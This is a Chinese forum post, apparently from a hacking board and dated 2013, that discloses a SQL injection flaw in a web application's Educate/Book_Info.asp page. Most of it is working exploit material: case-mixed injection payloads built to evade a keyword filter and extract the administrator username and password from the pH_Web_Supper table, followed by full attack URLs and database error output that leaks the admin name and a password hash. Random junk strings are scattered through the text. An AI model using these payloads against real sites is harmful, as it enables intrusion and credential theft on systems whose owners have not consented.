漏洞出现在Educate/Book_Info.asp - q' e1 Q7 L# u
! v3 X& f; G4 \9 Q0 W5 V此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出( \ ]4 F) ^4 l( D- k/ E( ]( Z% E
4 K' L& r( X' K6 H/ O
exp:如下4 P4 O! c$ T+ L" d+ ?
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ I5 `' }) G1 ~/ n# P查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)5 j! N5 Q8 ?& i0 X1 T2 Y
6 \! E. L; f: ?: {
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ f( s2 I0 V. H* m $ n5 R! g0 f0 w, o8 g
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'6 G0 i; O9 j! ^* u3 V; i
0 f7 M8 m: c$ M9 t5 j, X
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。! I& D3 h* f. N
. o7 g# `! D; f/ H7 A/Educate/Book_Info.asp,行 8 i6 d; e0 K8 b& j/ a: \
7 M0 v2 m5 P/ w7 O6 G0 ?
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 r2 o; ]' ~$ c+ L' m
: n- G* }5 Q+ o& x
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'9 V, f J6 j( h4 _' ?
+ s9 D- b& s6 g/ m3 b( A V! G将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
& y( Y7 J, K/ ^( R, i* g& _
4 E8 ~! |6 G; y2 S4 ~/Educate/Book_Info.asp,行 87 @3 r) \' f# R- ]) H# o
|
发表于 2013-2-16 21:44:16
收藏
支持
反对